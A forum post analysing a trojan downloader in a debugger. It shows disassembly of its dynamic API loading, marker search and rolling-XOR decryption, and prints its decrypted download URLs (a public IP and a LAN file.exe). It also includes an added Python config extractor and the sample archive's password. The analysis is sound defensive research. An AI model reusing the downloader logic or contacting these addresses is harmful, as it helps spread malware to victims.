House of Hackers

Hello everyone. Today I want to share one of my virus analyses with you.
This is a common trojan downloader on the internet, and it has lots of junk code.
I didn't analyse all of it, because the downloaded file is missing.
(About the downloaded file, we may ask the trojan author.)
Another thing: my English is poor, so I'm sorry to trouble you with reading this article.
(Maybe you can PM me to point out where I should modify and improve it.)
OK, let's start:
First, load it in OllyDbg and we will see this:

00403CA6 >/$ 55 push ebp
00403CA7 |. 89E5 mov ebp, esp
00403CA9 |. 83EC 28 sub esp, 28
00403CAC |. 81EC 3C080000 sub esp, 83C
00403CB2 |. 89E3 mov ebx, esp
00403CB4 |. 8925 A23C4000 mov dword ptr [403CA2], esp
00403CBA |. A1 3B504000 mov eax, dword ptr [<&KERNEL32.LoadLibraryA>]
00403CBF |. 8943 41 mov dword ptr [ebx+41], eax
00403CC2 |. A1 37504000 mov eax, dword ptr [<&KERNEL32.GetProcAddress>]
00403CC7 |. 8983 D9070000 mov dword ptr [ebx+7D9], eax
00403CCD |. E8 98D6FFFF call 0040136A

Look at the call at 00403CCD: this call loads three DLLs (kernel32.dll, user32.dll, wininet.dll)
and gets some API addresses. wininet.dll is the most important, because it shows that the
program may download a file from the internet. Then the init work is over, and the program
needs the web site address or the IP to download the file from. We continue looking...
After a VirtualAlloc, we can see this:

00403D33 |. 8983 70040000 mov dword ptr [ebx+470], eax
00403D39 |. 8B83 70040000 mov eax, dword ptr [ebx+470]
00403D3F |. 8983 1B080000 mov dword ptr [ebx+81B], eax
00403D45 |. 83EC 04 sub esp, 4
00403D48 |. B4 72 mov ah, 72
00403D4A |. 8D83 00020000 lea eax, dword ptr [ebx+200]
00403D50 |. 890424 mov dword ptr [esp], eax
00403D53 |. E8 F6EBFFFF call 0040294E

The call at 00403D53 is an important function. It first gets the program name (using GetCommandLineA)
and opens the file with CreateFileA. It then tries to find a marker that locates the web site string it needs.
First it looks for "AAAA", but unfortunately there are several "AAAA" in this file, not only one.
So once one is found, the program has to check the dword after "AAAA". If it is "XCRS", then the destination
address is found.

00402CC2 |> \8BB3 66060000 |mov esi, dword ptr [ebx+666]
00402CC8 |. 813E 41414141 |cmp dword ptr [esi], 41414141 // here to find the sign "AAAA"
00402CCE |. 74 02 |je short 00402CD2 // if matched, continue checking the next sign
00402CD0 |. EB 50 |jmp short 00402D22 // otherwise, go to next loop
00402CD2 |> 8B83 66060000 |mov eax, dword ptr [ebx+666]
00402CD8 |. 8983 ED060000 |mov dword ptr [ebx+6ED], eax
00402CDE |. 8383 ED060000>|add dword ptr [ebx+6ED], 4
00402CE5 |. 8B83 ED060000 |mov eax, dword ptr [ebx+6ED]
00402CEB |. 8943 4E |mov dword ptr [ebx+4E], eax
00402CEE |. 8B73 4E |mov esi, dword ptr [ebx+4E]
00402CF1 |. 813E 58435253 |cmp dword ptr [esi], 53524358 // here to find the sign "XCRS"
00402CF7 |. 74 02 |je short 00402CFB
00402CF9 |. EB 27 |jmp short 00402D22
00402CFB |> 8B83 66060000 |mov eax, dword ptr [ebx+666] // here, the destination address is found
00402D01 |. 8983 59050000 |mov dword ptr [ebx+559], eax
00402D07 |. 80F1 BE |xor cl, 0BE
00402D0A |. 8383 59050000>|add dword ptr [ebx+559], 8 // add address 8 byte to skip the sign
00402D11 |. 8B83 59050000 |mov eax, dword ptr [ebx+559]
00402D17 |. 8983 66060000 |mov dword ptr [ebx+666], eax
00402D1D |. 80E6 63 |and dh, 63
00402D20 |. EB 1B |jmp short 00402D3D

And here it checks the destination address. If it's NULL, the function returns 0; otherwise, it continues to
decrypt the data.
00402D3D |> \8B45 08 mov eax, dword ptr [ebp+8]
00402D40 |. 8983 6A060000 mov dword ptr [ebx+66A], eax
00402D46 |. 8B83 F8010000 mov eax, dword ptr [ebx+1F8]
00402D4C |. 3983 66060000 cmp dword ptr [ebx+666], eax // check the destination address
00402D52 |. 7C 05 jl short 00402D59
00402D54 |. E9 09010000 jmp 00402E62 // if it's NULL, function over

The decrypting call is at 00402E02. Although it has a lot of junk code, the actual decryption algorithm is
very simple (written here as plain C instead of inline asm; SIZEOFDATA is the length of the encrypted buffer):

unsigned char key = 0x6F;                  /* initial XOR key */
for (size_t i = 0; i < SIZEOFDATA; i++)
{
    dest_addr[i] ^= key;                   /* one byte at a time */
    key += 0x93;                           /* key steps by 0x93 per byte, wrapping at 8 bits */
}

At last, we get a string like "http://207.226.177.100/dl?w=1077&a=0", and the function
returns 1. Actually, if the function returns 0, there is another string, "http://192.168.1.3/php/file.exe",
so we know it can spread in the LAN. Then the most important thing is downloading the file. The call at
00403EFE does this. The function first checks the API addresses to see whether they are valid.

00402F05 /$ 55 push ebp
00402F06 |. 89E5 mov ebp, esp
00402F08 |. 81EC B0000000 sub esp, 0B0
00402F0E |. 8B1D A23C4000 mov ebx, dword ptr [403CA2]
00402F14 |. 83BB 09040000>cmp dword ptr [ebx+409], 0 // RtlAllocateHeap
00402F1B |. 74 6F je short 00402F8C // if the API address is invalid, function over
00402F1D |. 80C6 54 add dh, 54
00402F20 |. 83BB FF070000>cmp dword ptr [ebx+7FF], 0 // InternetCrackUrlA
00402F27 |. 74 63 je short 00402F8C
00402F29 |. 83BB 40050000>cmp dword ptr [ebx+540], 0 // InternetOpenA
00402F30 |. 74 5A je short 00402F8C
00402F32 |. 83BB 98030000>cmp dword ptr [ebx+398], 0 // InternetConnectA
00402F39 |. 74 51 je short 00402F8C
00402F3B |. 83BB 80040000>cmp dword ptr [ebx+480], 0 // HttpOpenRequestA
00402F42 |. 74 48 je short 00402F8C
00402F44 |. 80C5 12 add ch, 12
00402F47 |. 83BB 28040000>cmp dword ptr [ebx+428], 0 // GetProcessHeap
00402F4E |. 74 3C je short 00402F8C
00402F50 |. 83BB BB040000>cmp dword ptr [ebx+4BB], 0 // HttpSendRequestA
00402F57 |. 74 33 je short 00402F8C
00402F59 |. 83BB 78040000>cmp dword ptr [ebx+478], 0 // HttpQueryInfoA
00402F60 |. 74 2A je short 00402F8C
00402F62 |. B1 6A mov cl, 6A
00402F64 |. 83BB 17060000>cmp dword ptr [ebx+617], 0 // InternetQueryDataAvailable
00402F6B |. 74 1F je short 00402F8C
00402F6D |. B2 5E mov dl, 5E
00402F6F |. 83BB 38050000>cmp dword ptr [ebx+538], 0 // Sleep
00402F76 |. 74 14 je short 00402F8C
00402F78 |. 83BB 01070000>cmp dword ptr [ebx+701], 0 // InternetReadFile
00402F7F |. 74 0B je short 00402F8C
00402F81 |. 83BB F4010000>cmp dword ptr [ebx+1F4], 0 // InternetCloseHandle
00402F88 |. 74 02 je short 00402F8C
00402F8A |. /EB 0A jmp short 00402F96
00402F8C |> |B8 00000000 mov eax, 0 // API address invalid, function over and return 0
00402F91 |. |E9 E7070000 jmp 0040377D

Then, debugging in OD, we see the connection to 207.226.177.100 (or 192.168.1.3) on port 50.
The program uses InternetQueryDataAvailable and InternetReadFile in a loop to download the file into memory.
Well, it seems that the author has removed the download file; I couldn't get the correct file when I was analysing it.
Instead, it looks like this:
0009D4E8  3C 68 74 6D 6C 3E 0D 0A 3C 68 65 61 64 3E 3C 74  <html>..<head><t
0009D4F8  69 74 6C 65 3E 34 30 34 20 4E 6F 74 20 46 6F 75  itle>404 Not Fou
0009D508  6E 64 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64  nd</title></head
0009D518  3E 0D 0A 3C 62 6F 64 79 20 62 67 63 6F 6C 6F 72  >..<body bgcolor
0009D528  3D 22 77 68 69 74 65 22 3E 0D 0A 3C 63 65 6E 74  ="white">..<cent
0009D538  65 72 3E 3C 68 31 3E 34 30 34 20 4E 6F 74 20 46  er><h1>404 Not F
0009D548  6F 75 6E 64 3C 2F 68 31 3E 3C 2F 63 65 6E 74 65  ound</h1></cente
0009D568  6E 67 69 6E 78 2F 30 2E 35 2E 33 36 3C 2F 63 65  nginx/0.5.36</ce
0009D578  6E 74 65 72 3E 0D 0A 3C 2F 62 6F 64 79 3E 0D 0A  nter>..</body>..
0009D588  3C 2F 68 74 6D 6C 3E                             </html>

Later we will see that it should be a PE file which is encrypted. Look at this:
00403F37 |. 8BB3 A0040000 mov esi, dword ptr [ebx+4A0]
00403F3D |. 813E 58435253 cmp dword ptr [esi], 53524358 // compare with "XCRS"
00403F43 |. 74 02 je short 00403F47

The (encrypted) PE file should begin with "XCRS". If so, decrypting begins; if not,
it doesn't need to be decrypted (maybe this means the file was got from the LAN). The decryption is the same as before.
The call is at 00403FA8.
At last, the call at 00404000 checks the decrypted file.
From here, we know the file is a PE file:
0040270C |> \8B45 08 mov eax, dword ptr [ebp+8]
0040270F |. 8983 0F060000 mov dword ptr [ebx+60F], eax
00402715 |. 8BB3 0F060000 mov esi, dword ptr [ebx+60F]
0040271B |. 83C6 00 add esi, 0
0040271E |. 66:813E 4D5A cmp word ptr [esi], 5A4D // compare the file head with "MZ"
00402723 |. 75 02 jnz short 00402727
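Pulling the pieces above together, here is an added example (Python, written for this write-up, not the trojan's own code) that re-implements the "AAAA"/"XCRS" config search and the rolling XOR from 00402E02, plus the "XCRS" and "MZ" checks on the downloaded blob. It assumes the embedded URL is NUL-terminated once decrypted and that the downloaded blob's ciphertext starts right after its 4-byte "XCRS"; all sample bytes are constructed.

```python
# Config extractor for the marker/rolling-XOR scheme described above (added
# example for this write-up, not the trojan's code; samples are constructed).
MARKER, SIGN = b"AAAA", b"XCRS"
KEY_START, KEY_STEP = 0x6F, 0x93       # from the decrypt loop at 00402E02


def rolling_xor(data: bytes, key: int = KEY_START, step: int = KEY_STEP) -> bytes:
    """Symmetric byte-wise XOR; the key is one byte and wraps, as in the sample."""
    out = bytearray()
    for b in data:
        out.append(b ^ (key & 0xFF))
        key = (key + step) & 0xFF
    return bytes(out)


def find_config(buf: bytes):
    """Offset just past 'AAAA''XCRS' (the 8-byte skip at 00402D0A), or None.
    A lone 'AAAA' is rejected, exactly as the loop at 00402CC2 rejects it."""
    pos = buf.find(MARKER)
    while pos >= 0:
        if buf[pos + 4:pos + 8] == SIGN:
            return pos + 8
        pos = buf.find(MARKER, pos + 1)
    return None


def extract_url(buf: bytes):
    """Decrypt from the marker up to the first decrypted NUL (assumed terminator)."""
    start = find_config(buf)
    if start is None:
        return None
    plain = rolling_xor(buf[start:])
    end = plain.find(b"\x00")
    return plain[:end if end >= 0 else None].decode("ascii", "replace")


def unwrap_download(blob: bytes):
    """Mirror of the checks at 00403F3D and 0040270C: decrypt only if the blob
    starts with 'XCRS' (ciphertext assumed to follow the 4-byte sign), then
    accept the result only if it begins with the 'MZ' header."""
    payload = rolling_xor(blob[4:]) if blob.startswith(SIGN) else blob
    return payload if payload.startswith(b"MZ") else None


# Constructed samples: a decoy 'AAAA' first, then the real marker and blob.
URL = b"http://203.0.113.5/dl?w=1077&a=0"
SAMPLE = b"MZ junk AAAA decoy " + MARKER + SIGN + rolling_xor(URL + b"\x00") + b" tail"
FAKE_PE = b"MZ\x90\x00 constructed stub"
WRAPPED = SIGN + rolling_xor(FAKE_PE)
```

Run the same functions over a real dropper image to pull the C2 URL out without executing the sample; a blob that fails the "MZ" check after decryption is a sign the key or layout differs from this variant.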

But I didn't finish analysing it, because I don't have the
correct file. It's too hard to construct one. If you are interested in it, you can try :)

A summary:
1. This trojan has a lot of junk code.
2. It dynamically loads the DLLs and APIs it needs.
3. It downloads a file from a designated site and can spread in the LAN.
4. Much important data is encrypted, and the program decrypts it when needed.
5. The whole process has many checks; if one fails, the program may exit.

--------------------------------------------------------------------------------------------------

Warning: This is a trojan; don't run or debug it on your real machine, use a virtual machine.

The RAR's password is "virus".

Replies to This Discussion

Cool, and thank you for sharing with us ;)
I think your English is pretty good too,
maybe because I'm a French man :p
